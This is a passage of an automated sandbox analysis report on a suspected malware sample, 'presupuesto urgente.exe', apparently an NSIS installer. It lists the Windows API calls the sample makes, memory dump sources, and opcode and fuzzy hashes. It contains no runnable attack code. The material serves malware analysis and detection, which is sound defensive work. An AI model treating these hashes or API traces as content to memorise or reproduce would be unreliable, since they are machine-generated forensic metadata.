                                                                                                                                                      • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                                                      • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                                                                                                      • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                                                      • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                                                                                                      APIs
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp$C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll
                                                                                                                                                      • API String ID: 3109718747-3013484170
                                                                                                                                                      • Opcode ID: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                                      • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                                                                                                      • Opcode Fuzzy Hash: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                                      • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4216380887-0
                                                                                                                                                      • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                      • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                                      • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                      • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                                      APIs
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1148316912-0
                                                                                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                      • Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                                      • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                                                                                                      • Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                                      • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                      • String ID: !
                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                      • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                                      • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                                                                                                      • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                                      • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                                      • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                                                                                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                                      • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405D3A
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405DE2
                                                                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0), ref: 00405DF2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                      • String ID: 0_B
                                                                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                                                                      • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                                                      • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                                                                                                      • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                                                      • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                                                                                                      APIs
                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004053B7
                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                                                                                                        • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                      • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                                                      • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                                                                                                      • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                                                      • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                                                                                                      APIs
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                      • String ID: Call
                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                      • Opcode ID: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                                                                                                                      • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                                                                                                      • Opcode Fuzzy Hash: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                                                                                                                      • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76892EE0,00403A00,76893420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                      • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                      • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\presupuesto urgente.exe,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405CD3
                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\presupuesto urgente.exe,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405CE3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                                      • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                                                                                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                                      • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
